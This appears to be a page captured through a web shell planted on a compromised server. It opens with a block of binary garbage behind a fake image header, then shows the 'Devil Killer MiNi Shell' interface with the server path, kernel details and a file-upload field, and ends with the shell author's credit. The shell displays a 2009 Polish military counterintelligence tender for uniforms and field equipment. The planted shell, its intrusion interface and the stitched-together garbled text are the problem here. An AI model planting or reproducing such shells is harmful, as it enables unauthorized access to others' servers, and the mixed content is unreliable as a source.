JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/135440-N-2009.html

<p class="kh_header"><b>Warszawa 60: Dostawa umundurowania i wyposażenia (oznaczenie sprawy: ZP-14-Log-2009)</b><br>
<b>Numer ogłoszenia: 135440 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Logistyki Służby Kontrwywiadu Wojskowego , ul. W. Oczki 1, 02-007 Warszawa 60, woj. mazowieckie, tel. 022 684 11 19, 684 15 87, faks 022 6841203.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa umundurowania i wyposażenia (oznaczenie sprawy: ZP-14-Log-2009).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostarczenie do Zamawiającego przedmiotów zaopatrzenia mundurowego (pzm) wyszczególnionych poniżej, spełniających wymagania nw. aktualnych Wojskowych Dokumentacji Techniczno - Technologicznych (WDTT) oraz wzorów przedmiotów, obowiązujących w Resorcie Obrony Narodowej. Przedmioty te wybrani w wyniku rozstrzygnięcia niniejszego postępowania o zamówienie publiczne Wykonawcy wyprodukują na podstawie Wojskowych Dokumentacji Techniczno - Technologicznych i potwierdzonych przez Wojskowy Ośrodek Badawczo - Wdrożeniowy Służby Mundurowej do produkcji seryjnej wzorów pzm.  

Przedmiot zamówienia podzielony został na 5 Zadań ofertowych (części):

Zadanie ofertowe nr 1 - ocieplacze ćwiczebne i ubrania ochronne (kod CPV: 35812000-9): 
1)Ocieplacz ćwiczebny w ilości 100 kpl., WDTT - 621/MON, kod CPV: 35113400-3;
2)Ubranie ochronne w ilości 65 kpl., WDTT - 128/MON, kod CPV: 35812000-9.

Zadanie ofertowe nr 2 - mundury polowe (kod CPV: 35812000-9):
1)Mundur polowy letni w ilości 350 kpl., WDTT - 124Z/MON, kod CPV: 35812000-9;
2)Mundur polowy wz. 93 w ilości 250 kpl., WDTT - 127A/MON, kod CPV: 35812000-9.

Zadanie ofertowe nr 3 - oznaki stopni i pochewki (kod CPV: 39561000-2):
1)Oznaki stopni wojsk lądowych do kurtki ubrania ochronnego z ocieplaczem w ilości 500 szt., WDTT -833/MON, kod CPV: 39561000-2;
2)Pochewki haftowane z oznakami stopni wz. 93 w ilości 500 par, WDTT -  828A/MON, kod CPV: 39561000-2;
3)Pochewki z oznakami stopni wz. 93 w ilości 150 par, WDTT - 831A/MON, kod CPV: 39561132-6.

Zadanie ofertowe nr 4 - wyposażenie (kod CPV: 18931000-4):
1)Karimata w ilości 100 szt., WDTT - 730/MON, kod CPV: 39532000-0;
2)Szelki do przenoszenia oporządzenia w ilości 100 szt., WDTT - 988/MON, kod CPV: 18323000-9;
3)Zasobnik piechoty górskiej w ilości 100 szt., WDTT- 987/MON, kod CPV: 18931000-4.

Zadanie ofertowe nr 5 - rękawice, czapki, szalokominiarki (kod CPV: 18141000-9):
1)Rękawice zimowe 5-palcowe w ilości 100 par, WDTT - 615/MON, kod CPV: 18141000-9;
2)Czapka futrzana oficera wojsk lotniczych w ilości 20 szt., WDTT- 415/MON, kod CPV: 18443320-5;
3)Szalokominiarka kolor czarny w ilości 100 szt., WDTT - 533/MON, kod CPV: 18422000-3;
4)Rękawiczki zimowe kolor czarny w ilości 170 par, WDTT - 544/MON, kod CPV: 18424000-7;
5)Rękawice polowe wz. 93 w ilości 100 par, WDTT - 612/MON, kod CPV: 18141000-9.

Zamawiający zastrzega sobie ujęcie pzm o rozmiarach nietypowych, które nie są dostępne w WDTT, zgodnie ze specyfikacjami ilościowo-rozmiarowymi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9, 39.56.10.00-2, 39.56.11.32-6, 35.11.34.00-3, 18.32.30.00-9, 18.93.10.00-4, 18.14.10.00-9, 18.44.33.20-5, 18.42.40.00-7, 18.42.20.00-3, 39.53.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawcy składający ofertę na Zadanie ofertowe nr 1 i Zadanie ofertowe nr 2 pod rygorem wykluczenia wniosą wadium w wysokości odpowiednio: Zadanie ofertowe nr 1 - 3.500,00 zł (słownie złotych: trzy tysiące pięćset i 00/100) Zadanie ofertowe nr 2 - 2.500,00 zł (słownie złotych: dwa tysiące pięćset i 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają wymagania określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2007r. Nr 223 poz. 1655 z późn.zm.) zwanej dalej /ustawą/, tj.:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 ustawy). 

2)	Zamawiający będzie oceniał spełnianie w/w wymagań jako spełnia/nie spełnia na podstawie złożonych oświadczeń i dokumentów wymienionych w rozdziale VII SIWZ. 

3)	Wykonawca może spełniać albo nie spełniać warunków udziału w postępowaniu, oceny spełniania warunków nie stopniuje się. 

4)	Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli będzie to wynikało z oświadczeń i dokumentów, o których mowa w rozdziale VII SIWZ złożonych wraz z ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	W celu potwierdzenia, spełniania warunków udziału w postępowaniu Wykonawcy dostarczą  wraz z ofertą następujące oświadczenia i dokumenty: 
a)	pisemne oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu (załącznik nr 2 SIWZ) zgodnie z art. 22 ust. 1 ustawy, z tym, że w przypadku, gdy Wykonawca nie dysponuje potencjałem technicznym lub osobami zdolnymi do wykonania zamówienia, do oferty załącza odpowiednie pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia, 
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2)	Dokument, o którym mowa w pkt 1) lit. b) oraz zobowiązania podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku poświadczania za zgodność z oryginałem kopii dokumentów przez osoby nie wymienione w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza lub przez wystawcę pełnomocnictwa.

3)	Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 1) lit. b) składają dokumenty zgodnie z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.), tj. dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentu zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

4)	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

5)	W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o zamówienie (np. w formie tzw. konsorcjum) Zamawiający wymaga:
a)	aby wraz z ofertą Wykonawcy wspólnie ubiegający się o zamówienie przedłożyli dokument (np. pełnomocnictwo) określający co najmniej jego zakres, strony występujące wspólnie oraz wskazujący pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia (pełnomocnictwo winno być przedstawione w formie oryginału lub kopii potwierdzonej notarialnie, bądź przez jego wystawcę);Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (art. 23 ustawy) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
b)	podpisania oferty przez pełnomocnika;
c)	złożenia kompletu dokumentów wymaganych przez Zamawiającego;
d)	w przypadku oświadczenia, o którym mowa w pkt. 1) lit. a)
-	w zakresie art. 22 ust. 1 pkt 1-3 ustawy oświadczenie podpisał pełnomocnik Wykonawców wspólnie ubiegających się o zamówienie, gdyż Zamawiający będzie brał pod uwagę łączne uprawnienia Wykonawców do wykonywania działalności/czynności wchodzących w zakres zamówienia, ich łączny potencjał techniczny, kadrowy, kwalifikację, wiedzę i doświadczenie, a także ich łączną sytuację ekonomiczną i finansową; 
-	w zakresie art. 22 ust. 1 pkt 4 ustawy oświadczenie złożył i podpisał każdy z Wykonawców wspólnie ubiegających się o zamówienie (każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi oddzielnie udokumentować fakt, że nie podlega wykluczeniu z postępowania);
e)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa dokument określony w pkt. 1) lit. b); 
f)	wypełniając dokumenty powołujące się na Wykonawcę, w miejscu /nazwa i adres Wykonawcy/ należy wpisać dane dotyczące pełnomocnika.UWAGA:Spółka cywilna nie jest przedsiębiorcą, natomiast wspólnicy s.c. w ramach wykonywanej przez nich działalności gospodarczej uznawani są za przedsiębiorców i to wspólnicy są podmiotem praw i obowiązków z tytułu prowadzonej działalności. Oferta składana przez spółki cywilne jest traktowana jako oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 23 ustawy)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://przetargi.army.mil.pl (plik: SIWZ _ZP14, rozszerzenie .zip).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawa, ul. W. Oczki 1, tel. wew. 841-119.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 12:00, miejsce: Sekretariat Biura Logistyki SKW w Warszawie poprzez Kancelarię Jawną SKW mieszczącą się przy ul. T. Chałubińskiego/róg W. Oczki 1 (tel. wew. 846-131, w godz. 8:30 - 15:00 w dni robocze).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie ofertowe nr 1 - ocieplacze ćwiczebne i ubrania ochronne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nw. przedmiotów zaopatrzenia mundurowego:
1)Ocieplacz ćwiczebny w ilości 100 kpl., WDTT - 621/MON, kod CPV: 35113400-3;
2)Ubranie ochronne w ilości 65 kpl., WDTT - 128/MON, kod CPV: 35812000-9..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9, 35.11.34.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie ofertowe nr 2 - mundury polowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nw. przedmiotów zaopatrzenia mundurowego:
1)Mundur polowy letni w ilości 350 kpl., WDTT - 124Z/MON, kod CPV: 35812000-9;
2)Mundur polowy wz. 93 w ilości 250 kpl., WDTT - 127A/MON, kod CPV: 35812000-9..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie ofertowe nr 3 - oznaki stopni i pochewki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nw. przedmiotów zaopatrzenia mundurowego:
1)Oznaki stopni wojsk lądowych do kurtki ubrania ochronnego z ocieplaczem w ilości 500 szt., WDTT -833/MON, kod CPV: 39561000-2;
2)Pochewki haftowane z oznakami stopni wz. 93 w ilości 500 par, WDTT -  828A/MON, kod CPV: 39561000-2;
3)Pochewki z oznakami stopni wz. 93 w ilości 150 par, WDTT - 831A/MON, kod CPV: 39561132-6..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.10.00-2, 39.56.11.32-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie ofertowe nr 4 - wyposażenie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nw. przedmiotów zaopatrzenia mundurowego:
1)Karimata w ilości 100 szt., WDTT - 730/MON, kod CPV: 39532000-0;
2)Szelki do przenoszenia oporządzenia w ilości 100 szt., WDTT - 988/MON, kod CPV: 18323000-9;
3)Zasobnik piechoty górskiej w ilości 100 szt., WDTT- 987/MON, kod CPV: 18931000-4..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.10.00-4, 18.32.30.00-9, 39.53.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie ofertowe nr 5 - rękawice, czapki, szalokominiarki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nw. przedmiotów zaopatrzenia mundurowego:
1)Rękawice zimowe 5-palcowe w ilości 100 par, WDTT - 615/MON, kod CPV: 18141000-9;
2)Czapka futrzana oficera wojsk lotniczych w ilości 20 szt., WDTT- 415/MON, kod CPV: 18443320-5;
3)Szalokominiarka kolor czarny w ilości 100 szt., WDTT - 533/MON, kod CPV: 18422000-3;
4)Rękawiczki zimowe kolor czarny w ilości 170 par, WDTT - 544/MON, kod CPV: 18424000-7;
5)Rękawice polowe wz. 93 w ilości 100 par, WDTT - 612/MON, kod CPV: 18141000-9..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.14.10.00-9, 18.44.33.20-5, 18.42.20.00-3, 18.42.40.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com